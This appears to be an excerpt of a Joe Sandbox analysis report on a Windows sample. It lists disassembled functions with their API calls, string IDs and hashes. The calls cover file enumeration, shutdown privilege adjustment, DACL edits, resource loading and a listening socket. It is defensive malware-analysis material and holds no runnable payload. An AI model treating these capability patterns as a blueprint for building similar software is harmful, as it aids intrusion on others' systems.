                                                                                                                                                                                                                • API String ID: 1409584000-438819550
                                                                                                                                                                                                                • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                                                                                                                                • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                                                                                                                                                                Function 00431BE8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 116COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00431C2E
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00431C3A
                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                                                                                                                                                                • String ID: :$\$\??\%s
                                                                                                                                                                                                                • API String ID: 2192556992-3457252023
                                                                                                                                                                                                                • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                                                                                                                                • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                                                                                                                                                                Function 004720DB Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 004722B9
                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FolderPath$LocalTime__swprintf
                                                                                                                                                                                                                • String ID: %.3d
                                                                                                                                                                                                                • API String ID: 3337348382-986655627
                                                                                                                                                                                                                • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                                                                                                                                                • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                                                                                                                                                                                Function 00442886 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 135fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00442930
                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                                                                                                                                                                  • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                • String ID: *.*
                                                                                                                                                                                                                • API String ID: 2640511053-438819550
                                                                                                                                                                                                                • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                                                                                                                                • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                                                                                                                                                                                Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00433414
                                                                                                                                                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                                                                                                                                                                • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                                                                                                                                                                • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                                                                                                                                                • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                • API String ID: 2938487562-3733053543
                                                                                                                                                                                                                • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                                                                                                                                • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                                                                                                                                                                Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                                                                                                                                                                  • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                                                                                                                                                                  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                                                                                                                                                                  • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                                                                                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                                                                                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                                                                                                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                                                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                                                                                                                                                                • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                                                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                                                                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                                                                                                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1255039815-0
                                                                                                                                                                                                                • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                                                                                                                                • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                                                                                                                                                                Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00433073
                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00433085
                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00433092
                                                                                                                                                                                                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                                                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                                                                                                                                                                • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                                                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                                                                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                                                                                                                                                                • LockResource.KERNEL32(?), ref: 00433120
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1158019794-0
                                                                                                                                                                                                                • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                                                                                                                                • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                                                                                                                                                                Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1737998785-0
                                                                                                                                                                                                                • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                                                                                                                                • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                                                                                                                                                                Function 0045D619 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0045D6BF
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                                                                                • API String ID: 4194297153-14809454
                                                                                                                                                                                                                • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                                                                                                                                • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                                                                                                                                                                Function 0044EB5F Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 643COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _memmove$_strncmp
                                                                                                                                                                                                                • String ID: @oH$\$^$h
                                                                                                                                                                                                                • API String ID: 2175499884-3701065813
                                                                                                                                                                                                                • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                                                                                                                                • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                                                                                                                                                                Function 004652BE Relevance: 12.1, APIs: 8, Instructions: 97networkCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                                                                                                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                                                                                                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                                                                                                                                                                • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                                                                                                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 540024437-0
                                                                                                                                                                                                                • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                                                                                                                                • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                                                                                                                                                                Function 0044663B Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 895COMMON
                                                                                                                                                                                                                Download Yara Rule
